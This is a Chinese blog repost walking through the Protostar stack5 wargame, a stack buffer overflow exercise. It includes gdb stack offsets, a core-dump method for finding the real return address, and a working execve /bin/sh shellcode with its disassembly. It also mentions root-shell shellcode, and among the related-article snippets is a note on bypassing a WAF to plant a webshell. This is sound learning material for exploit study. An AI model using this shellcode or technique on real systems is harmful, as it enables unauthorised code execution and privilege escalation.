protostar_stack5

最新推荐文章于 2024-07-14 02:05:00 发布
最新推荐文章于 2024-07-14 02:05:00 发布
阅读量131 收藏 1
点赞数
文章标签: shell php
原文链接:http://www.cnblogs.com/ydfr/p/3189468.html
版权
这次的练习很难,要真正的实现一个shellcode
 
 
那么我们先来了解一下最简单的shellcode:
 
这个运行的结果是在shell中产生一个新的shell。
 
和以往一样,首先查看目标文件的内容,main函数部分:
 
gdb调试,在main处设置断点,查看断点的信息:
 
我们发现:
esp 0xbffffcd0
ebp 0xbffffd28 = esp + 88
buffer esp + 16
我们把那个最简单的shellcode反汇编之后的结果加进去!
但是这个产生了段错误!
 
经过查阅资料,我了解到产生段错误的原因是由于gdb中调试的栈,和真实运行的栈的位置,不一定相同!!
所以要通过调试dump core文件来查看真实的栈的位置!
 
首先打开 core dump设置,用ulimit -c unlimited命令
 
我们在tmp目录下找到了刚刚生成的core文件!
 
结果如下:
 
 
所以,我们应该把返回地址设为 0x bffffd50!
 
我们插入的简单的shellcode是:"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
 
  31 c0                        xor %eax,%eax
  50                             push %eax
  68 6e 2f 73 68          push $0x68732f6e
  68 2f 2f 62 69           push $0x69622f2f
  89 e3                        mov %esp,%ebx
  50                             push %eax
  53                             push %ebx
  89 e1                        mov %esp,%ecx
  b0 0b                        mov $0xb,%al
  cd 80                        int $0x80
 
这是一段启动shell的命令,效果如下:
 
 
刚才为了调试打开dump core设置,进入了root用户,在返回地址的前面加上几个NOP,防止指令损坏什么的。既然可以执行我们想要执行的shellcode,那么也可以用更牛逼的shellcode,比如在普通用户的shell中执行shellcode进入root命令行!
这里面最后有一个例子
作者使用了 http://www.exploit-db.com/exploits/13357/这个例子,使得从普通shell获得了root shell!
另外作者推荐了两个网站:
 
可是,让我感到痛苦的就是那个gdb的问题,这个真是令人意想不到,原来gdb中的地址也不是真实的,好吧。
 
 
 
 





转载于:https://www.cnblogs.com/ydfr/p/3189468.html

weixin_30552811
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Exploit Exercises - Protostar Stack
u011500307的专栏
03-18 2727
这个网站是http://exploit-exercises.com/protostarStack 0: #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(
Exploit-Exercises-Protostar:漏洞利用解决方案 Protostar
07-07
1. **栈溢出漏洞**:在ProtostarStack系列练习中,我们首次接触这个主题。当程序未能正确检查输入数据的长度,导致缓冲区被超出边界的数据填充时,就会发生栈溢出。学习者需要了解EIP(指令指针寄存器)的概念,...
Protostar stack5
weixin_34074740的博客
04-14 189
AboutStack5 is a standard buffer overflow, this time introducing shellcode.Hints:At this point in time, it might be easier to use someone elses shellcodeIf debugging the shellcode, use \xcc...
传统栈溢出-(Exploit-exercise-protostar-stack5)
MillionSky的专栏
04-11 801
1 概述传统栈溢出有这些特点:没有ASLR没有NX 题目来自https://exploit-exercises.com/protostar/stack5/ 本来觉得很简单的,还是纠结了半天。Exploit-exercise-protostar-stack5的第一个坑就是setuid程序的core dump没有打开。需要这样操作:su - root #password:godmodeecho 1 &...
Exploit-Exercise之Protostar-stack
Yale的博客
07-20 1403
0x00 Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。 本文将介绍stack部分。 关于环境准备,在官网https://exploit-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。然后使用user/user即可登录 查看ip 知道ip后可以在kali中ssh连上 输入user即可 机器上所有需要分析的程序都在如下路径 0x0 来看第一关stack0 源码如下 这题很简单,就是在if里判断mo
Protostar Stack Write Up
无节操
11-08 1495
Protostar Stack0 #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you
protostar-s:解决protostar挑战
02-14
在"protostar-s"中,"s"可能代表"source"或"stack",暗示着这个版本可能主要关注栈相关的安全问题。Protostar的挑战通常分为多个级别,从简单到复杂,让学习者逐渐掌握各种安全漏洞的原理和利用方法。 下面我们将...
protostar-relay:官方Relay devtool的开源迭代
03-20
原始中继Proto Relay是基于官方devtool的,用于React ...导航并选择文件夹:protostar-relay> Shells>浏览器> chrome>构建>解压缩 转到使用Relay构建的网站,然后打开“ proto *”面板。使用Relay的网站包括: 如何
Protostellar_Outflows
04-06
在天文学中,原恒星(Protostar)是处于演化早期阶段、正在积累物质并最终形成成熟恒星的天体。在这个过程中,原恒星会发射出强烈的喷流,这些喷流被称为原恒星喷流(Protostellar Outflows)。这些喷流是由原恒星...
exploit-exercises-arm:我已经接受了 Protostar 的所有挑战 - https
06-14
我已经接受了 Protostar 的所有挑战 - 并为 ARM 架构编译了它们。 我在本地使用的 QEMU 设置包括 -> 和 Radare2 Python 绑定。 我将在接下来的两周内添加格式、堆、网络和最终练习 - 很快回来查看! SSH # ...
exploit-exercises-protostar
weixin_30292745的博客
05-12 2324
转载学习于 http://www.programlife.net/exploit-exercises-protostar-writeup-1.html stack0 ```````````````````````````````````````````````````````````````````````````````````````````````` 1#include...
Exploit Exercises Protostar Stack Part 0-7
giantbranch的专栏
08-03 1993
Stack0 首先看下源码 #include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(...
Exploit练习Protostar——stack2
weixin_34315485的博客
04-30 124
简介   这次练习通过环境变量设置buffer的值,所以我们需要在exploit中设置一个大于64字节的环境变量。 源码 1 #include <stdlib.h> 2 #include <unistd.h> 3 #include <stdio.h> 4 #include <string.h> 5 6 int ...
第一节 SHELL脚本中的常用命令(2)
weixin_73298423的博客
07-11 211
查看网卡,设置网卡(dncp网络工作模式或静态网络工作模式),和设置时的注意
Shell基础之函数和数组
qq_64227183的博客
07-13 431
Shell基础之函数和数组
【Linux杂货铺】1.环境变量
C++领域内容分享
07-11 321
每一个可执行程序都会收到一张环境变量表,环境变量表是一个字符指针数组。
记一次Ueditor上传Bypss
2401_83799022的博客
07-11 336
前一段时间和小伙伴在某内网进行渗透测试,目标不给加白,只能进行硬刚了,队友fscan一把梭发现某资产疑似存在Ueditor组件,但初步测试是存在waf和杀软的,无法进行getshell,经过一番折腾最终getshell,文笔粗劣,大佬勿喷。本以为到这就可以完全shell,但发现这只是开始,以上测试仅仅是后缀的绕过,开始将gif换成含有shell 的文件,直接被拦截,虽然返回了路径,但实际是访问不到的。从访问日志可以看出是?x 后缀,因为直接采用?看到这个返回内容 很绝望,所以有了上面后缀的绕过。
shell 字符串列表操作
tianyexing2008的博客
07-12 215
我的需求是这样的:编译多个模块的时候,把失败的模块添加到列表里,最后输出。这个列表类似这样:failModuleList="a b c d e"列表(List):在Shell中,列表是由空格分隔的字符串序列。注意:shell 的语法,“=”、“+=” 两边都不能有空格。
Linux笔记之shell终端命令后显示指定行数的grep和head
最新发布
小勇博客
07-14 432
在Linux中,grep命令和head命令常用于文本处理。grep命令用于搜索文本中的特定模式,而head命令用于显示文件的开头部分。了解如何结合这两个命令(例如使用管道)可以帮助你更高效地处理和查看文本数据。grep -A选项用于在匹配到的行之后显示指定数量的行。例如,将显示匹配到的行及其后面的三行。选项用于显示文件的前n行。例如,将显示file.txt的前五行。
shell脚本之免交互
2401_84618124的博客
07-12 411
一、免交互1.1 简单解释免交互交互:在计算机中,交互一般指发出指令控制程序的运行,程序在接收到指令之后按照指令的效果做出对应的反应。免交互:间接地通过第三方的方式把指令传送给程序,不用直接地下达指令。一般通过脚本。Here Document 免交互这是命令行格式,也可以写在脚本当中。通过I/O重定向的方式将命令的列表传送给交互式程序或命令。是标准输入的一种替代品,代替了人工的输入方式。语法格式如下图:EOF。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值